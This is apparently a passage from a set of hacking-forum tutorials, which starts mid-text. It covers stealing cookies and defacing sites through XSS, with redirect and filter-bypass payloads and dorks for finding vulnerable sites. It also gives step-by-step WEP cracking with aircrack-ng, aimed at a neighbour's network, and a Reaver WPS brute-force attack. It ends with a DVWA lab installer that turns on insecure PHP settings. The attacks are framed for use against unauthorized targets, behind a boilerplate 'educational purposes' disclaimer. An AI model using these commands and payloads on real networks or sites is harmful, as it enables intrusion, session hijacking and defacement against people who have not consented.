Once you get the cookie, you can use "Cookie Manager" Firefox addon to manipulate and edit the cookies so that you can hijack the administrators session. I find Cookie Manager a very useful app for XSS, make sure to download it.

Defacing
Defacing is one of the most common things people like to do when they have access to multiple administrator options. Mostly so that they can advertise themselves, and simply let the administrator know that their security has been breached. Anyways, defacing with XSS requires persistent XSS, maybe a comment box, or something. You can use this script to create a re-direct to your deface page (You should probably redirect it to your deface on Pastehtml.com, because it's anonymous uploading.)

Code:
<script>window.location="http://www.pastehtml.com/YOURDEFACEHERE/";</script>
XSS: Onmouseover
Onmousover isn't a very exploitable vulnerability. But yet, it is still considered XSS. An onmouseover vulnerability would look something like this:

Code:
onmouseover=prompt1337

We can exploit this, by editing it to:

Code:

onmouseover=alert("XSS")

Very basic vulnerability, but it's getting more noticed, and patched in a lot more websites. Most sites will use Adobe Flash or CSS to do those kind of effects now.

XSS Filter Bypassing Techniques
Sometimes a simple XSS query just won't do the trick. The reason your query isn't working, is because the website has a WAF or Filter set in place. A filter will block as many XSS and SQLi queries as possible. In this case, we're dealing with XSS.

There are many ways on bypassing XSS filters, but I will only explain a few.

Hex Bypassing
With blocked characters like >, <, and /, it is quite difficult to execute an XSS query. Not to worry, there's always a solution :) You can change your characters, into Hex. A Hex of a certain character, is basically the character, but in a different format. These should help you out:

> = %3c
< = %3c
/ = %2f

ASCII Bypassing
With an ASCII encryption, we can use the character ". Which is blocked quite a bit. This is one of the most common XSS Filter bypasses of all time. A script that you would need to encrypt, would look like this:

NOT WORKING SCRIPT

Code:
<script>alert("XSS")</script>

WORKING SCRIPT

Code:
<script>alert(String.fromCharCode(88,83,83))</script>

To encrypt your little part of a script, go to this site: http://www.wocares.com/noquote.php I use that site, and find it quite useful.

Case-Sensitive Bypassing
This kind of bypass rarely works, but it's always worth a shot. Some filters are set in place to detect certain strings, however, the filter's strings that are blocked are CASE SENSITIVE. So all we need to do, is execute a script, with different sizes of characters. This bypass, would look like this:

Code:
<ScRiPt>aLeRt("XSS")</ScRiPt>

You can also mix that with ASCII encryption if you like. This kind of bypass only works on really stupid filters, or really REALLY old ones.
Some XSS Dorks
It's usually best to create/find your own dorks, but in this tutorial, I'll write some up real quick to share:

inurl:search.php?
inurl:find.php?
inurl:search.html
inurl:find.html
inurl:search.aspx
inurl:find.aspx
Those dorks are about as basic as they can get, sorry if they do not satisfy you. I rarely use dorks, and with this tutorial you shouldn't need to use dorks to find a vulnerable site. XSS is a very popular vulnerability. Even in google I found some. Some in HackForums too. XSS isn't a very high-priority, at least not Non-Persistent.

Note: This tutorial is only for Educational Purposes, I did not take any responsibility of any misuse, you will be solely responsible for any misuse that you do. Hacking email accounts is criminal activity and is punishable under cyber crime and you may get upto 40 years of imprisonment, if got caught in doing so. 

WEP cracking + installing ?

Backtrack 4 WEP cracking on Windows ?

I will be explaining how to install and use Backtrack on Windows XP for Vista and Linux it should be the same thing... Some problem fixes are below the tutorial

Few notes...

wlan0 = interface
-c = channel
bssid = MAC adress of the target
ssid (-a or -b) = name of the target
filenames (-w) = names of the wep.cap files

Installing Backtrack

1.Go to http://www.backtrack-linux.org and on the download section download the Backtrack 4 final edition .iso

2.Mount the .iso file on a DVD

3.Put the DVD in the your PC and restart

4.When it is restarting rapidly press the ESC button and then choose Boot from CD/DVD

Starting CMD and other...

1.Wait for Backtrack to load it can take up to 10 min or more...

2.When it loads it should look something like this...


[Image: backtrack4-boot.jpg]


3.Type startx and wait for it to load everything up...

4.Open the CMD...it is in the taskbar.

WEP cracking...

1.Type in the CMD airmon-ng It will show some "names" (interfaces) like wlan0 , wlan1...Mainly it will be just wlan0...so in other steps il be using wlan0 as the interface but you use your.

2.Then type airodump-ng wlan0 Replace wlan0 with your interface

3.Now it will show all the targets around your network you can hack...Choose one target and remember it's BSSID, NAME, CHANNEL and the INTERFACE is still the same as in the beginning in my case wlan0

4.Next type airodump-ng -w wep -c "the targets channel" --bssid "the targets bssid" wlan0 everything is without quotes...replace everything in the quotes with your information and waln0 with your interface...this will lock your target

5.Now that you have locked your slave leave the CMD open and open a new one.Type aireplay-ng -1 0 -a "targets bssid" wlan0 Again replace everything with your information

6.Now leave that CMD open too (now you have two CMD's) and open a new one (now you have 3 ).Type aireplay-ng -3 -b "targets bssid" wlan0Again fill with your information and without quotes

7.Now on one of the CMD's numbers will start showing those are the amount of packets...wait for it to get to 30000 packets . Go take a lunch it will take hours

8.When it finally gets to 30000 press CTRL+C.Now type dir that will show the files you got.Then open up new console and type aircrack-ng "filename" Mainly it is gonna be wep-03.cap or other .cap file

9.Now the pass should be cracked and it will show numbers something like 68:89:90 and similar just copy that without the ::: and paste it like a password and you should be in your neighbors network
PROBLEMS

1.Unable to airodump-ng!----well just go into a CMD type ifconfig eth0 up and then type dhclient eth0 and then airmon-ng start "interface""interface replace with your inter.

2.Not gettin' any targets?---Try using a laptop I got better results when I used my laptop.Also try the ifconfig eth0 up and dhclient eth0

3.Can't start Backtrack?---Ok first chesk did you even choose boot from CD/DVD.Then check if you mounted it on the DVD and not just put the .iso on it!

4.Asking for login?---As login type root and as password type toor :)
These are main problems any other questions please ask I will try to help
Enjoy!

PLEASE COMMENT..oh if I made a mistake please let me know...

Note: This tutorial is only for Educational Purposes, I did not take any responsibility of any misuse, you will be solely responsible for any misuse that you do. Hacking email accounts is criminal activity and is punishable under cyber crime and you may get upto 40 years of imprisonment, if got caught in doing so.

Installing backtrack & cracking WPS ?


Greetings Users


Recently I have discovered a method to crack WPA/WPA2 Wireless networks.

What you will need:

- BackTrack ( I would recommend the latest possible version, as of now it's Version 5 RC3)
- A laptop or desktop equipped with a BackTrack compatible wireless card
- The ability to type commands into a terminal
- Novice computer knowledge.

How to install BackTrack 5 Live on to a USB in 5 steps. (Minimum 2GB Space Required):
Step 1: Download the ISO

[Image: bt-download.jpg]

Step 2:
Download UNetBootin
You are going to want to format the USB you are going to use
to FAT32, other filesystems like NTFS will not work.
Start UNetBootin and select the 'diskimage' option, choose the iso
you downloaded earlier. Select the amount of space to use for
persistence in MB. Select the correct USB drive and click 'OK'.
[Image: R3_unebootin_live01.PNG]

Step 3:

Reboot your computer, and open your BIOS or CMOS setup.
If you have an understanding of your BIOS, select your USB
as the first boot option, and restart. If you do not know how
to change your boot options follow this link to learn how.

Step 4:

Boot your computer on the USB drive, you will see a boot menu appear,
Use your arrow keys if necessary to select the 'Default Boot Text Mode'
Boot option.

Step 5:

Once it has booted, you should now see that BackTrack has started,
and it's in a command line. Type 'startx' (without quotations) to boot
up the desktop GUI.

That concludes how to install BackTrack Live to a USB.

How to install Reaver on BackTrack:
One step process:

Open terminal and type 'apt-get update'
Once it has fully updated, follow up with the following,
'apt-get install reaver'
Once that has completed, There you have it, Reaver is now installed.

How to execute the Reaver bruteforce attack, once installed
Step 1:

Locate your wireless card device name,
to do this, open up Terminal, and type the following:
'iwconfig' and press enter. You should see your wireless
device in the subsequent list. Chances are it will be named
'wlan0', but if you have more than one wireless card, or an
unusual networking setup, it may be named something different.

[Image: wlan0.jpg]

Step 2:

Enable monitor mode on your wireless card,
to do this, type the following command:
'airmon-ng start wlan0'
[Image: mon0.jpg]

Step 3:

Find the BSSID of the router you would like to crack,
To do this, type the following command:
'airodump-ng wlan0' (if wlan0 doesn't work, try using mon0 instead.)
You will see a list of wireless networks in range, It will look similar to
the following image below:

[Image: bssid.jpg]

When you have spotted the network you would like to crack,
press Ctrl+C to stop the list from refreshing. Select the BSSID
by Highlighting it, and copy it.

Step 4:

It's finally time to crack that network,
To do this, Type the following command:
'reaver -i moninterface -b bssid -vv'
Put your monitor interface (wlan0, mon0, or other) where I put 'moninterface',
and put your target's BSSID where I typed bssid.
eg. 'reaver -i mon0 -b 12:34:56:78:90:10'
Press enter, sit back, and let Reaver do it's incredible attack.

[Image: cracked.jpg]
-
Note, Cracking can take anywhere from 2 hours to a full day, BE PATIENT!

- Something else I should have mentioned, this attack takes advantage of WPS on routers,
it bruteforces the WPS pin to retrieve the password, so if the router(s) you intend to attack does not have WPS enabled,
(in most cases majority of people don't even know what that is, though most routers these days
have it for ease of access to connect) it will not be able to retrieve the password through reaver.
Thanks!

Note: This tutorial is only for Educational Purposes, I did not take any responsibility of any misuse, you will be solely responsible for any misuse that you do. Hacking email accounts is criminal activity and is punishable under cyber crime and you may get upto 40 years of imprisonment, if got caught in doing so.

How to Install Damn Vulnerable Web App ?


Backtrack is the best Linux distribution for penetration testing and ethical hacking purposes, backtrack 5 R1 is the latest one and as discussed tutorials about backtrack 5 are also applicable on backtrack 5 R1. So in this tutorial I will tell you how to install damn vulnerable web application on backtrack machine, however you can install damn vulnerable web application on windows, MAC and some other Linux distribution like Ubuntu process is approximately same.

What Is Damn Vulnerable Web Application?

Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment.

It is a best platform to practice web application hacking and security.

Damn Vulnerable Web Application Tutorial Backtrack 5 R1


Generally we need xampp server to setup damn vulnerable web application but xampp server is nothing but a collection of apache, sql, perl, PHP, openssl and other server side software's but backtrack 5 has all of these software's installed. It means there is no need to install xampp on backtrack machine. All you need to do is to get damn vulnerable web app and put it on the root directory of backtrack. We have a wonderful bash that automate all the process.


#/bin/bash
echo -e "\n#######################################"
echo -e "# Damn Vulnerable Web App Installer Script #"
echo -e "#######################################"
echo " Coded By: Travis Phillips"
echo " Website: http://theunl33t.blogspot.com"
echo -e -n "\n[*] Changing directory to /var/www..."
cd /var/www > /dev/null
echo -e "Done!\n"


echo -n "[*] Removing default index.html..."
rm index.html > /dev/null
echo -e "Done!\n"


echo -n "[*] Changing to Temp Directory..."
cd /tmp
echo -e "Done!\n"


echo "[*] Downloading DVWA..."
wget http://voxel.dl.sourceforge.net/project/dvwa/DVWA-1.0.7.zip
echo -e "Done!\n"


echo -n "[*] Unzipping DVWA..."
unzip DVWA-1.0.7.zip > /dev/null
echo -e "Done!\n"


echo -n "[*] Deleting the zip file..."
rm DVWA-1.0.7.zip > /dev/null
echo -e "Done!\n"


echo -n "[*] Copying dvwa to root of Web Directory..."
cp -R dvwa/* /var/www > /dev/null
echo -e "Done!\n"


echo -n "[*] Clearing Temp Directory..."
rm -R dvwa > /dev/null
echo -e "Done!\n"


echo -n "[*] Enabling Remote include in php.ini..."
cp /etc/php5/apache2/php.ini /etc/php5/apache2/php.ini1
sed -e 's/allow_url_include = Off/allow_url_include = On/' /etc/php5/apache2/php.ini1 > /etc/php5/apache2/php.ini
rm /etc/php5/apache2/php.ini1
echo -e "Done!\n"


echo -n "[*] Enabling write permissions to /var/www/hackable/upload..."
chmod 777 /var/www/hackable/uploads/
echo -e "Done!\n"


echo -n "[*] Starting Web Service..."
service apache2 start &> /dev/null
echo -e "Done!\n"


echo -n "[*] Starting MySQL..."
service mysql start &> /dev/null
echo -e "Done!\n"


echo -n "[*] Updating Config File..."
cp /var/www/config/config.inc.php /var/www/config/config.inc.php1
sed -e 's/'\'\''/'\''toor'\''/' /var/www/config/config.inc.php1 > /var/www/config/config.inc.php
rm /var/www/config/config.inc.php1
echo -e "Done!\n"


echo -n "[*] Updating Database..."
wget --post-data "create_db=Create / Reset Database" http://127.0.0.1/setup.php &> /dev/null
mysql -u root --password='toor' -e 'update dvwa.users set avatar = "/hackable/users/gordonb.jpg" where user = "gordonb";'
mysql -u root --password='toor' -e 'update dvwa.users set avatar = "/hackable/users/smithy.jpg" where user = "smithy";'
mysql -u root --password='toor' -e 'update dvwa.users set avatar = "/hackable/users/admin.jpg" where user = "admin";'
mysql -u root --password='toor' -e 'update dvwa.users set avatar = "/hackable/users/pablo.jpg" where user = "pablo";'
mysql -u root --password='toor' -e 'update dvwa.users set avatar = "/hackable/users/1337.jpg" where user = "1337";'
echo -e "Done!\n"


echo -e -n "[*] Starting Firefox to DVWA\nUserName: admin\nPassword: password"
firefox http://127.0.0.1/login.php &> /dev/null &
echo -e "\nDone!\n"
echo -e "[\033[1;32m*\033[1;37m] DVWA Install Finished!\n"

Copy this code open text editor paste and than save it to whatever.sh and than open yout terminal locate the directory where you have saved this file before than use.

sh whatever.sh

You are done your damn vulnerable web application are install successfully, all the credit goes to the unl33t for the wonderful script.


Note: This tutorial is only for Educational Purposes, I did not take any responsibility of any misuse, you will be solely responsible for any misuse that you do. Hacking email accounts is criminal activity and is punishable under cyber crime and you may get upto 40 years of imprisonment, if got caught in doing so.